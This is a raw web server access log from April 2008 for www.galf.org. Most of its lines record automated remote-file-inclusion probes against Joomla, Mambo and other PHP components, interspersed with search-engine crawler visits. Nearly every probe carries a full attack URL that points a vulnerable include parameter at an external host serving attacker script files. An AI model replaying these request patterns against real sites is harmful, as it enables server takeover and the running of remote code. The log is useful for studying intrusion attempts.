72.232.255.166 - - [14/Apr/2008:06:28:29 -0700] "GET /logs/access_070917.log/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:28:29 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:28:29 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
220.220.214.150 - - [14/Apr/2008:06:32:09 -0700] "GET /logs/access_070917.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:32:18 -0700] "GET /logs/access_070806.log//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:32:18 -0700] "GET //com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:32:18 -0700] "GET /logs//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
74.6.22.153 - - [14/Apr/2008:06:32:22 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.9.171 - - [14/Apr/2008:06:32:22 -0700] "GET /logs/access_080407.log HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:32:30 -0700] "GET /logs/access_070730.log//com_articles.php?absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
24.172.171.18 - - [14/Apr/2008:06:34:17 -0700] "GET /logs//index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
24.172.171.18 - - [14/Apr/2008:06:34:18 -0700] "GET //index.php?option=com_expose&Itemid=&mosConfig_absolute_path=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.galf.org"
83.195.197.241 - - [14/Apr/2008:06:34:30 -0700] "GET / HTTP/1.1" 200 1048 "http://fr.search.yahoo.com/search;_ylt=A1f4cfkOXQNI.u0ADjljAQx.?p=index+of+lesbianas&fr=sfp&ei=UTF-8&rd=r1" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" "www.galf.org"
195.38.20.12 - - [14/Apr/2008:06:35:45 -0700] "GET /logs/modules/projects/gantt.php?dPconfig[root_dir]=http://www.gomaka.com/uploader/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
195.38.20.12 - - [14/Apr/2008:06:35:46 -0700] "GET /modules/projects/gantt.php?dPconfig[root_dir]=http://www.gomaka.com/uploader/t.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.0.1) Gecko/20060111 Firefox/1.5.0.1" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:36:14 -0700] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:36:14 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:36:14 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:36:15 -0700] "GET /logs/access_070917.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:36:15 -0700] "GET /administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:36:15 -0700] "GET /logs/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
81.220.77.108 - - [14/Apr/2008:06:36:30 -0700] "GET /logs/access_070826.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Microsoft-WebDAV-MiniRedir/5.1.2600" "www.galf.org"
81.220.77.108 - - [14/Apr/2008:06:36:30 -0700] "GET /logs/access_070826.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "www.galf.org"
202.191.38.81 - - [14/Apr/2008:06:36:39 -0700] "GET /admin.php?include_path=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
202.191.38.81 - - [14/Apr/2008:06:36:39 -0700] "GET /logs/admin.php?include_path=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
59.23.214.107 - - [14/Apr/2008:06:37:34 -0700] "GET /logs/access_070826.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.5a) Gecko/20030728 Mozilla Firebird/0.6.1" "www.galf.org"
72.18.192.224 - - [14/Apr/2008:06:39:06 -0700] "GET /includes/functions_common.php?vwar_root2=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
72.18.192.224 - - [14/Apr/2008:06:39:06 -0700] "GET /logs/includes/functions_common.php?vwar_root2=http://aceperform.890m.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.galf.org"
221.150.101.150 - - [14/Apr/2008:06:43:09 -0700] "GET /logs/access_070917.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)" "www.galf.org"
220.92.7.136 - - [14/Apr/2008:06:45:52 -0700] "GET /logs/access_070917.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (http://www.googlebot.com/bot.html)" "www.galf.org"
202.47.247.140 - - [14/Apr/2008:06:46:27 -0700] "GET /logs/access_070716.log/contrib/mx_glance_sdesc.php?mx_root_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.47.247.140 - - [14/Apr/2008:06:46:28 -0700] "GET /contrib/mx_glance_sdesc.php?mx_root_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
202.143.173.2 - - [14/Apr/2008:06:46:29 -0700] "GET /logs/contrib/mx_glance_sdesc.php?mx_root_path=http://www.phanom.ac.th/msnlist/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.215.223.191 - - [14/Apr/2008:06:48:24 -0700] "GET //ashnews.php?pathtoashnews=http://www.talentsupplier.com/cdtmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.187.197.184 - - [14/Apr/2008:06:49:35 -0700] "GET /logs/access_070827.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.0.3705; .NET CLR 1.1.4322)" "www.galf.org"
77.92.68.25 - - [14/Apr/2008:06:49:47 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
77.92.68.25 - - [14/Apr/2008:06:49:47 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://www.motociclismo.pt/images/banners/canboy? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
211.187.197.184 - - [14/Apr/2008:06:50:11 -0700] "GET /logs/access_070716.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8a5) Gecko/20041122" "www.galf.org"
211.187.197.184 - - [14/Apr/2008:06:50:16 -0700] "GET /logs/access_070716.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Googlebot/2.1 (http://www.googlebot.com/bot.html)" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:50:21 -0700] "GET /logs/access_080317.log/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:50:21 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:50:21 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
74.53.197.2 - - [14/Apr/2008:06:50:28 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:51:35 -0700] "GET /logs/access.log/administrator/components/com_comprofiler/plugin.class.php?mosConfig_absolute_path=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
213.215.223.191 - - [14/Apr/2008:06:52:07 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.talentsupplier.com/cdtmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.215.223.191 - - [14/Apr/2008:06:52:08 -0700] "GET //ashnews.php?pathtoashnews=http://www.talentsupplier.com/cdtmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
213.215.223.191 - - [14/Apr/2008:06:52:09 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.talentsupplier.com/cdtmp/special.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:52:59 -0700] "GET /logs/access_070820.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:52:59 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:52:59 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:53:04 -0700] "GET /logs/access_070820.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:53:04 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:53:05 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
216.167.156.20 - - [14/Apr/2008:06:53:54 -0700] "GET /index.php?page=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
216.167.156.20 - - [14/Apr/2008:06:53:54 -0700] "GET /logs/index.php?page=http://theleybournes.com/img/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
200.201.48.20 - - [14/Apr/2008:06:54:08 -0700] "GET /index.php?pag=http://games.enet.com.cn/zhuanti/dkp/02.gif? HTTP/1.0" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:54:30 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:54:30 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:54:34 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:54:34 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:06:55:35 -0700] "GET /administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:06:55:35 -0700] "GET /logs/administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
75.102.21.197 - - [14/Apr/2008:06:56:06 -0700] "GET /modules/projects/gantt.php?dPconfig[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
75.102.21.197 - - [14/Apr/2008:06:56:11 -0700] "GET /logs/modules/projects/gantt.php?dPconfig[root_dir]=http://trosken.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:56:16 -0700] "GET /logs/access_080324.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id2.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:06:56:19 -0700] "GET /logs/access_080324.log//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/arab.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:56:28 -0700] "GET /logs/access_080317.log/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:56:28 -0700] "GET /components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
72.232.255.166 - - [14/Apr/2008:06:56:28 -0700] "GET /logs/components/com_joomlaboard/image_upload.php?sbp=http://gukmin.or.kr/bbs/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.galf.org"
74.6.31.251 - - [14/Apr/2008:06:56:47 -0700] "GET /logs/?N=A HTTP/1.0" 200 7214 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
84.16.233.242 - - [14/Apr/2008:06:57:47 -0700] "GET /logs/access_070723.log?name=GbookMX&op=Add_Sign HTTP/1.1" 200 4087522 "-" "-" "www.galf.org"
59.112.187.163 - - [14/Apr/2008:06:57:56 -0700] "GET /logs/access_071231.loghttp://workersparty.chat.ru/images? HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:06:58:49 -0700] "GET //modules/Forums/admin/admin_db_utilities.php?http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:06:58:49 -0700] "GET /logs//modules/Forums/admin/admin_db_utilities.php?http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:06:58:53 -0700] "GET /logs/access_071029.log//skin/zero_vote/error.php?dir=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:06:58:53 -0700] "GET //skin/zero_vote/error.php?dir=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:06:58:54 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:00:00 -0700] "GET //schedule/tools/send_reminders.php?noSet=0&includedir=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:00:00 -0700] "GET /logs//schedule/tools/send_reminders.php?noSet=0&includedir=http://www.eenpotnat.com/modules/poll/me.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
74.6.8.90 - - [14/Apr/2008:07:00:39 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
74.6.24.177 - - [14/Apr/2008:07:00:39 -0700] "GET /logs/access_080414.log HTTP/1.0" 200 589824 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:01:43 -0700] "GET /logs/access_080107.log//skin/zero_vote/error.php?dir=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [14/Apr/2008:07:03:01 -0700] "GET /logs/access_080324.log///com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [14/Apr/2008:07:03:02 -0700] "GET ///com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.89.191.68 - - [14/Apr/2008:07:03:02 -0700] "GET /logs///com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://anonymouse.org/cgi-bin/anon-www.cgi/http://h1.ripway.com/Dins/idbom.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:03:50 -0700] "GET /logs//includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
147.102.106.10 - - [14/Apr/2008:07:03:50 -0700] "GET //includes/orderSuccess.inc.php?glob=1&cart_order_id=1&glob[rootDir]=http://www.pcr.ac.id/~rina/includes/file/mic.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.17; Mac_PowerPC)" "www.galf.org"
204.15.248.10 - - [14/Apr/2008:07:04:00 -0700] "GET /logs//classes/adodbt/sql.php?classes_dir=http://www.ibukimasta.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
204.15.248.10 - - [14/Apr/2008:07:04:00 -0700] "GET //classes/adodbt/sql.php?classes_dir=http://www.ibukimasta.com/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-GB; rv:1.7.10) Gecko/20050717 Firefox/1.0.6" "www.galf.org"
125.164.238.196 - - [14/Apr/2008:07:04:14 -0700] "GET /logs/access_070820.log HTTP/1.0" 200 327680 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:26 -0700] "GET /logs/access_070702.log HTTP/1.1" 404 275 "http://uk.wrs.yahoo.com/_ylt=A9iby4uxwFlHgXIB5yLdmMwF;_ylu=X3oDMTB2c2Zzc202BGNvbG8DZQRsA1dTMQRwb3MDMwRzZWMDc3IEdnRpZAM-/SIG=11udur808/EXP=1197150769/**http%3A//www.galf.org/logs/access_070702.log" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:27 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:36 -0700] "GET /logs/access_070826.log HTTP/1.1" 200 2228224 "http://uk.wrs.yahoo.com/_ylt=A9iby4uxwFlHgXIB5CLdmMwF;_ylu=X3oDMTB2dnY0Nm1iBGNvbG8DZQRsA1dTMQRwb3MDMgRzZWMDc3IEdnRpZAM-/SIG=11u8s6he9/EXP=1197150769/**http%3A//www.galf.org/logs/access_070826.log" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:36 -0700] "GET /logs/ HTTP/1.1" 200 7230 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:38 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:40 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:41 -0700] "GET /logs/ HTTP/1.1" 200 7230 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
194.158.104.34 - - [14/Apr/2008:07:04:42 -0700] "GET / HTTP/1.1" 200 1048 "-" "Mozilla/5.0 (X11; U; Linux i686; fr; rv:1.8.1.13) Gecko/20080325 Ubuntu/7.10 (gutsy) Firefox/2.0.0.13" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:07:05:56 -0700] "GET /logs//administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
69.9.129.6 - - [14/Apr/2008:07:05:56 -0700] "GET //administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://www.westminsterakron.com/templates/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:06:26 -0700] "GET /logs/access_071008.log/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:06:26 -0700] "GET /newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:06:27 -0700] "GET /logs/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:06:42 -0700] "GET /logs/access_071008.log/newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
85.214.111.118 - - [14/Apr/2008:07:06:43 -0700] "GET /newspublish/include.php?path[docroot]=http://nerdscience.com/robot.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
